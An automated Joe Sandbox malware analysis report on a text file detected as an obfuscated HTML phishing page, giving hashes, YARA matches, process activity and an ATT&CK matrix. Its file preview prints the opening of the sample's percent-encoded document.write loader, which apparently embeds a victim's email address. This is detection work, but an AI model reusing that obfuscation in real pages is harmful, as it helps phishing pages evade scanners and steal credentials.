Loading ...

Play interactive tourEdit tour

Analysis Report file.txt

Overview

General Information

Sample Name:file.txt
Analysis ID:392880
MD5:8896a1eb844cb01ce56eddfabe90282d
SHA1:78b25819b6270edc53c5763719b5c9f81bc3f1ac
SHA256:7db3772473959c79e30762b7f75bbca9abd8f41f1bd4e5530db7f63b3769f873
Infos:

Most interesting Screenshot:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected obfuscated html page
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • notepad.exe (PID: 3504 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\Desktop\file.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
file.txtJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    file.txtJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      Phishing:

      barindex
      Yara detected HtmlPhish44Show sources
      Source: Yara matchFile source: file.txt, type: SAMPLE
      Yara detected obfuscated html pageShow sources
      Source: Yara matchFile source: file.txt, type: SAMPLE
      Source: classification engineClassification label: mal56.phis.winTXT@1/0@0/0
      Source: C:\Windows\System32\notepad.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
      Source: notepad.exe, 00000000.00000002.934570873.00000234A24B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: notepad.exe, 00000000.00000002.934570873.00000234A24B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: notepad.exe, 00000000.00000002.934570873.00000234A24B0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: notepad.exe, 00000000.00000002.934570873.00000234A24B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\file.txt VolumeInformationJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Process Injection1OS Credential DumpingProcess Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemorySystem Information Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:392880
      Start date:19.04.2021
      Start time:23:35:09
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 55s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:file.txt
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:38
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal56.phis.winTXT@1/0@0/0
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .txt
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Report size getting too big, too many NtProtectVirtualMemory calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:HTML document, ASCII text, with very long lines
      Entropy (8bit):3.4046831362921006
      TrID:
        File name:file.txt
        File size:14862
        MD5:8896a1eb844cb01ce56eddfabe90282d
        SHA1:78b25819b6270edc53c5763719b5c9f81bc3f1ac
        SHA256:7db3772473959c79e30762b7f75bbca9abd8f41f1bd4e5530db7f63b3769f873
        SHA512:b8200ece81ebff8e4b654335d946e9e8c52336c28917fdc82a86ac73ab37dcc9e3fcf41638ca662b57dd4f72b9e75664a0097d0b12180e90b7bf075b875d2f36
        SSDEEP:192:ua/7cWZGSaQsbezjPQdzA68zM9oXC8M9hR8Zw5RmhLqa7oiSUy0/HA0:z944+zA68zGB8M9zkT75/A0
        File Content Preview:<script language="javascript">........document.write(unescape('%3c%21%44%4f%43%54%59%50%45%20%68%74%6d%6c%3e%3c%68%74%6d%6c%3e%3c%68%65%61%64%3e%3c%73%63%72%69%70%74%3e%76%61%72%20%6d%69%7a%7a%73%3d%22%72%68%61%6d%6d%6f%6e%64%40%74%62%63%6f%6e%73%75%6c%74

        File Icon

        Icon Hash:74f4e4e4e4e4e4e4

        Network Behavior

        No network behavior found

        Code Manipulations

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        System Behavior

        General

        Start time:23:36:05
        Start date:19/04/2021
        Path:C:\Windows\System32\notepad.exe
        Wow64 process (32bit):false
        Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\Desktop\file.txt
        Imagebase:0x7ff7977d0000
        File size:245760 bytes
        MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Disassembly

        Code Analysis

        Reset < >